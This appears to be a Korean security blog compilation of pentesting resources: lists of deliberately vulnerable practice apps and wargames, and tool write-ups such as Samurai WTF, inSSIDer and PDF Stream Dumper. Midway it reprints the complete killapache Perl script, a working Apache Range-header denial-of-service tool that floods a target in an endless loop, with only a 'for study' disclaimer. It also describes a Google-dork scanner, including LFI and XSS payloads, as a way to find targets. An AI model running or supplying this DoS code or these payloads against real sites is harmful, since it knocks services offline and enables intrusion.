暗行御史

공부하시는 학생들에게 좋은 자료가 될 것 같습니다.

May 10th, 2011

It’s very difficult for the beginner security analyst, mainly the ones interested in the area of pentesting, to find good study pentesting resources. Starting from the principle that in pentesting there are many other sub areas of study, it becomes more and more difficult to choose and then find a proper pentesting study application.

As the beginner knows nearly nothing it became very difficult to prepare a Home Pentesting Lab for study, once that beginners has to know something about coding a vulnerable application fisrt, then exploit them.

Thinking about that i’ve decided to gather a list, the most complete I could, with all vulnerable pentesting tools I could find. They are categorized based on the type of application like Web Pentesting, War Games and Insecure Distributions. Due to the amount of tools I won’t be doing any previews because it would delay this post a lot and make it a little boring to read. I’m gonna review every tool with complete labs later on in future posts.

As I don’t know every pentesting tool in the planet, feel free to contact me if you remember any application, in fact I would much appreciate it. And I apologize if I miscategorized some of them, feel free to tell me when I’ve done that so i can correct that.

Note that this post intends to show only vulnerable applications used to be exploited, not the tools used to exploit them.

 

Web Pentesting

Application Name	Company/Developer	URL
OWASP WebGoat	OWASP	http://www.owasp.org/index.php/OWASP_WebGoat_Project
OWASP Vicnum	OWASP	http://www.owasp.org/index.php/Category:OWASP_Vicnum_Project
OWASP InsecureWebApp	OWASP	http://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project
Web Security DOJO	Maven Security Consulting	http://www.mavensecurity.com/web_security_dojo/
Gruyere (antigo Codelab / Jalsberg)	Google	http://google-gruyere.appspot.com/
Hacme Game	NTNU	http://hacmegame.org/
SPI Dynamics	SPI Dynamics	http://zero.webappsecurity.com/
Acunetix 1	Acunetix	http://testphp.vulnweb.com/
Acunetix 2	Acunetix	http://testasp.vulnweb.com/
Acunetix 3	Acunetix	http://testaspnet.vulnweb.com/
PCTechtips Challenge	PC Tech Tips	http://pctechtips.org/hacker-challenge-pwn3d-the-login-form/
Damn Vulnerable Web Application	DVWA	http://dvwa.co.uk/
Mutillidae	Iron Geek	http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
The Butterfly Security Project	The Butterfly Security	http://sourceforge.net/projects/thebutterflytmp/
Hacme Casino	McAfee	http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx
Hacme Bank 2.0	McAfee	http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx
Updated HackmeBank	McAfee	http://www.o2-ounceopen.com/technical-info/2008/12/8/updated-version-of-hacmebank.html
Hacme Books	McAfee	http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx
Hacme Travel	McAfee	http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx
Hacme Shipping	McAfee	http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx
Moth	Bonsai Sec	http://www.bonsai-sec.com/en/research/moth.php
Stanford SecuriBench	Standford	http://suif.stanford.edu/%7Elivshits/securibench/
SecuriBench Micro	Standford	http://suif.stanford.edu/%7Elivshits/work/securibench-micro/
BadStore	BadStore	http://www.badstore.net/
WebMaven/Buggy Bank	Maven Security	http://www.mavensecurity.com/webmaven
EnigmaGroup	Enigma Group	http://enigmagroup.org/
XSS Encoding Skills – x5s (Casaba Watcher)	X5S	http://www.nottrusted.com/x5s/
Exploit- DB	Exploit DB	http://www.exploit-db.com/webapps
The Bodgeit Store	The Bodgeit Store	http://code.google.com/p/bodgeit/
LampSecurity	MadIrish	http://sourceforge.net/projects/lampsecurity/
hackxor	Hackxor	http://hackxor.sourceforge.net/cgi-bin/index.pl
WackoPicko	WackoPicko	https://github.com/adamdoupe/WackoPicko
RSnake’s Vulnerability Lab	RSnake	http://ha.ckers.org/weird/

 

War Games

Application Name	Company / Developer	URL
Hell Bound Hackers	Hell Bound Hackers	http://hellboundhackers.org/
Vulnerability Assessment	Kevin Orrey	http://www.vulnerabilityassessment.co.uk/
Smash the Stack	Smash the Stack	http://www.smashthestack.org/
Over the Wire	Over the Wire	http://www.overthewire.org/wargames/
Hack This Site	Hack This Site	http://www.hackthissite.org/
Hacking Lab	Hacking Lab	https://www.hacking-lab.com/
We Chall	We Chall	https://www.wechall.net/
REMnux	REMnux	http://zeltser.com/remnux/

 

Insecure Distributions

Application Name	Company / Developer	URL
Damm Vulnerable Linux	DVL	http://www.damnvulnerablelinux.org/
Metasploitable	Offensive Security	http://blog.metasploit.com/2010/05/introducing-metasploitable.html
de-ICE	Hacker Junkie	http://www.de-ice.net/
Moth	Bonsai Security Software	http://www.bonsai-sec.com/en/research/moth.php
PwnOS	Niel Dickson	http://www.neildickson.com/os/
Holynix	Pynstrom	http://pynstrom.net/holynix.php

 

Have fun !!!

[출처] http://www.felipemartins.info/2011/05/pentesting-vulnerable-study-frameworks-complete-list/

"사무라이" 리눅스 기반, 오픈 소스 및 프리웨어의 툴로 구성된 프레임 웍 형태에 웹 사이트 진단 및 테스팅 도구이다. backtrack에 밀려 좀처럼 알려지지 않았지만 진단자에게 필요한 툴로만 구성되어 있다.

 Samurai Web Testing Framework (WTF) is an excellent Linux-based LiveCD distribution created by Kevin Johnson of Secure Ideas and Justin Searle of InGuardians to include what they believe are the best of the open source and free tools that focus on testing and attacking websites, selections based on the tools they use as part of their job duties. As part of the Samurai collective there is also the Samurai WTF Firefox add-ons collection which includes web application penetration testing and security analysis add-ons for your Firefox browser.

<기본 베이스>

<다양한 진단 툴>

Download : http://sourceforge.net/projects/samurai/

[Notice: 악의적인 사용시 사용자 본인에게 책임이 있음을 공지합니다.]

구글 검색을 이용한 공격 툴이다. 자신의 사이트는 안전한가?

[출처]http://ferdianelli.wordpress.com/2011/01/08/update-08-jan-2011-xcode-sqlilfixss-vulnurable-webshell-scanner/

 

XCode SQLI/LFI/XSS Vulnurable & webshell Scanner

Setelah download, ekstrak semua filenya dan jalankan XCodeXploitScanner.exe, Klik Dork It dan Tool ini akan mengumpulkan Link dari Dork yang anda masukkan kemudian menampilkan listnya. setelah selesai menampilkan List, Anda akan bisa melakukan scanning kerentanan SQL injection/Local File Inclusion/Cross Site Scripting pada web yang ada di list. Tool ini akan mengirimkan parameter injeksi ke web seperti ‘ – * /../../../../../../../../../../../../../../etc/passwd%00 , “>alert(“XXS DETECTED XCode Exploit Scanner”) . Jika Web tersebut memiliki bug maka di status akan muncul : www.target.com?blabla.php?=1234 : SQLi Vulnerable.
www.target.com?blabla.php?=1234/../../../../../../../../../../../../../../etc/passwd%00 LFI Vulnerable
www.target.com?blabla.php?=1234″>alert(“XXS DETECTED XCode Exploit Scanner”) XSS Vulnerable

Pada status list yang terdeteksi, anda bisa klik Open Vuln Link with Browser untuk menampilkan web pada browser anda

Tool ini juga menambahkan webshell hunter, dimana anda bisa mencari web shell c99, r57, c100, ITsecteam_shell, b374k, yang telah diupload oleh hacker.

Mungkin masih banyak kekurangan atau Bug yang belum diketahui oleh penulis. Tapi setidaknya tool ini bisa mempermudah anda untuk mencari target.

Semoga Berguna

Screen Shot

LFI Vulnerable

Web Shell Hunter

Video penggunaan

================================================================
Credits:

Code name : .::XCode Exploit – Vulnurable & webshell Scanner::.
Description : – SQLI/LFI/XSS/Webshell Hunter with Google Engine -
Compiler : Microsoft Visual Basic 6.0
Author : poni
System : Windows 95, 98, XP, Vista, 7
Size : 718 kb
Update : I`m not sure where will i put it. Just
check the sites below

http://www.xcode.or.id

http://ferdianelli.wordpress.com

================================================================
Info :
XCode Exploit – Vulnurable & webshell Scanner help you to
gather the dorks Link from Google. then you may check the
results if its Vulnurable to exploit with SQL injection commands
, LFI,and XSS. And You may hunt the webshells those uploaded.
=================================================================

EOF

 

[Notice: 악의적인 사용시 사용자 본인에게 책임이 있음을 공지합니다.]

There is no patch yet released for this vulnerability on apache, but a few work arounds have been found. These have been posted by The Apache Software Foundation and can be used until a stable fix is released.The vulnerability works by exploiting a feature in web servers that gives you the ability to pause and resume your downloads. These days if you have to stop downloading something part-way through you can generally pick up where you left off and you don't have to start again from scratch.


Source
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
 print "Apache Remote Denial of Service (memory exhaustion)\n";
 print "by Kingcope\n";
 print "usage: perl killapache.pl <host> [numforks]\n";
 print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
 
$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
 $p .= ",5-$k";
}

for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next;  
 
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                         Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
 $pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                         Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
 print "host seems vuln\n";
 return 1; 
} else {
 return 0; 
}
}

if ($#ARGV < 0) {
 usage;
 exit; 
}

if ($#ARGV > 1) {
 $numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
 print "Host does not seem vulnerable\n";
 exit; 
}
while(1) {
killapache();
}

시스템 장애를 일으킬 수 있습니다.학습용으로 사용하시길 바랍니다.
단, 악의적인 사용시 사용자 본인의 책임을 명시합니다.



[출처] http://www.thehackernews.com/2011/08/killapache-ddos-tool-half-of-internet.html

Wireless Traffic 및 강도를 비쥬얼하게 보여주는 "inSSIDer" 강력한 AP 탐색 툴이다.
2.4 GHz와 5GHz를 선택할 수 있으며 뛰어난 탐색 능력을 자랑하여 무선랜 취약성 점검에
필자가 애용하는 툴이다.

우리집 주변의 AP들..별로 없다..^^; (다행히 WEP키 사용하는데는 보이지 않는다.)

중소 사업장에서 본인의 회사에 관리하는 AP확인 및 불법 AP가 존재를 탐지하는데
사용하시길 바랍니다.
 

PDF안에 악의적인 코드가 있는지 분석하는 툴입니다.
자세한 내용은 아래와 같습니다. :D

 

-----------------------------------------------------------------

This is a free tool for the analysis of malicious PDF documents. It also has some features that can make it useful for pdf vulnerability development.

Has specialized tools for dealing with obsfuscated javascript, low level pdf headers and objects, and shellcode. In terms of shellcode analysis, it has an integrated interface for libemu sctest, an updated build of iDefense sclog, and a shellcode_2_exe feature.

Javascript tools include integration with JS Beautifier for code formatting, the ability to run portions of the script live for live deobsfuscation, toolbox classes to handle extra canned functionality, as well as a pretty stable refactoring engine that will parse a script and replace all the screwy random function and variable names with logical sanitized versions for readability.

Tool also supports unescaping/formatting manipulated pdf headers, as well as being able to decode filter chains (multiple filters applied to the same stream object.)

Download: PDF Stream Dumper Setup 0.9.259 (includes full vb6 source)

Note: I have removed the sample shellcodes because they were giving people AV warnings.

Training videos for PDFStreamDumper:

• Feature Overview (17mb / 40min)
• Adobe Api Support v.9.194+ (4mb / 10min)
• Analysis of a complex sample using page Data
  • part 1 getPageNthWord (4mb / 10min)
  • part 2 URL Decoder & this.info object (3mb / 8min)
• Analysis of a complex sample using getAnnots (4mb / 10min)
• Demo of the new Sample Database Search Plugin (4.5mb / 11min)
• Video for plugin developers and script writers (7mb / 17min)
• shows some new js_ui features on an arguments.callee encrypted script
  • Sample 1 (6mb / 14min)
  • Sample 2 (4mb / 10min)
• scdbg Trainer 1 - General Use
• scdbg trainer 2 - Asm and Debug Shell

If you are looking for malicious pdf samples to analyze make sure to check out the Contagio and jsunpack sites.

International users: This new build should now work on systems with extended character set languages set as their default language. If you encounter errors please let me know.

Full feature list

• supported filters: FlateDecode, RunLengthDecode, ASCIIHEXDecode, ASCII85Decode, LZWDecode
• Integrated shellcode tools:
  • sclog gui (Shellcode Analysis tool I wrote at iDefense)
  • scdbg libemu based Shellcode analysis tool
  • Shellcode_2_Exe functionality
  • Export unescaped bytes to file
• supports filter chaining (ie multiple filters applied to same stream)
• supports unescaping encoded pdf headers
• scriptable interface to process multiple files and generate reports
• view all pdf objects
• view deflated streams
• view stream details such as file offsets, header, etc
• save raw and deflated data
• search streams for strings
• scan for functions which contain pdf exploits (dumb scan)
• format javascript using js beautifier (see credits in readme)
• view streams as hex dumps
• zlib compress/decompress arbitrary files
• replace/update pdf streams with your own data
• basic javascript interface so you can run parts of embedded scripts
• PdfDecryptor w/source - uses iTextSharp and requires .Net Framework 2.0
• Basic Javascript de-obsfuscator
• can hide: header only streams, duplicate streams, selected streams
• js ui also has access to a toolbox class to
  • simplify fragmented strings
  • read/write files
  • do hexdumps
  • do unicode safe unescapes
  • disassembler engine
  • replicate some common Adobe API (new)

Current Automation scripts include:

• csv_stats.vbs - Builds csv file with results from lower status bar for all files in a directory
• pdfbox_extract.vbs - use pdfbox to extract all images and text from current file
• string_scan.vbs - scan all decompressed streams in all files in a directory for a string you enter
• unsupported_filters.vbs - scan a directory and build list of all pdfs which have unsupported filters
• filter_chains.vbs - recursivly scans parent dir for pdfs that use multiple encoding filters on a stream.
• obsfuscated_headers.vbs - recursivly scans parent dir for pdfs that have obsfuscated object headers
• pdfbox_extract_text_page_by_page.vbs - uses pdfbox to extract page data into individual files
  
  

Current Plugins include:

• Build_DB.dll - Search and sort data inside multiple samples, move and organize files
• obj_browser.dll - view layout and data inside pdf in text form

 

PDFStreamDumper_Setup.exe

[출처] http://sandsprite.com/blogs/index.php?uid=7&pid=57

'Spell' 이란 '주문' 이라는 의미를 가진 단어.
"클릭 투 트윅"으로 유명한 개꿈님의  멋진 프로그램입니다.
한 동안 네X버에서 오르쪽 펌을 막아놔서 고생하셨던 분들이 저뿐만은 아니었겠죠.
소스 보기 기능은 보안에 중요한 요소 입니다. 패킷을 통해 물론 볼수 있지만..상당히 귀찮아지죠. 쩝
어떻게 만드시는건지.. 프로그래머로 잠시(?) 활동했었던 때가 생각나 호기심이 생깁니다. ^^;

사용법도 쉽습니다. 설치 후 눌러보시면 금방 아실 수 있습니다.

근데 이런건 또 어떻게 막아야 하나.. +ㅁ+;

참고로 프리웨어입니다.

[자료출처] http://www.rodream.net/

사용법은 초 간단하며 설명 필요없음~ ㅎ

회사의 IT자산 현황에 대해 파악하기 힘들어 하는 담당자들이 많다. 자신이 관리하는 서버가 몇 대이며 장비는 어떤건지 정확한 현황을 알수는 없지만 보조 툴로 사용하면 유용한 그런 팔박미인 스캐너가 있었으니...

물론 100여대 미만일 경우 효율적이다. -0-;;

필자가 사용하는 경우는 역시 P.T일 경우이다. 보안 담당자 뿐만 아니라 진단자 또한 당신의 시스템 구성도가 궁금하다.

여기선 내 PC와 블로거를 대상으로 어떻게 서비스가 되고 있는지 간단히 사진으로 소개하고 넘어간다.
적시적소에 사용하는 것이 중요하다.

[내 블로거 DNS 현황]

[내 컴의 IP 현황 및 시스템]

 

[운영중인 포트  및 서비스]

이 툴은 순수한 운영을 위해 나온 툴로 네트웍 담당자에게 유명한 제품이다.
어떻게 사용할 것인가? .... 물론 필자는 보안이다!

[자세한 제품 설명..]
http://www.solarwinds.com/

지금껏 PT하면서 여러 툴을 사용해 봤다.

자동화 스캐너는 PT에서 진단자가 놓친 부분을 찾아주고 검증해주는 툴이지 절대 신빙하면 안된다.

의사가 엑스레이만 보고 결론 내리지 않듯이..;

개인적으로 봤을때 가장 안전한 넘은 역시 비싼

IBM Rational AppScan

하지만 난 안쓴다.. -ㅅ-;  돈 읍다 ㅜㅜ

난 일부 무료 툴인 Netsparker
http://www.mavitunasecurity.com/netsparker/

 

혹은 귀요미 SandCat
http://www.syhunt.com/?n=Sandcat.Sandcat

근데..최근 1년간 진단툴을 사용해 본적없다.. -ㅅ-; 다 수동&전수 진단.. 
고객님 나뻐요~GG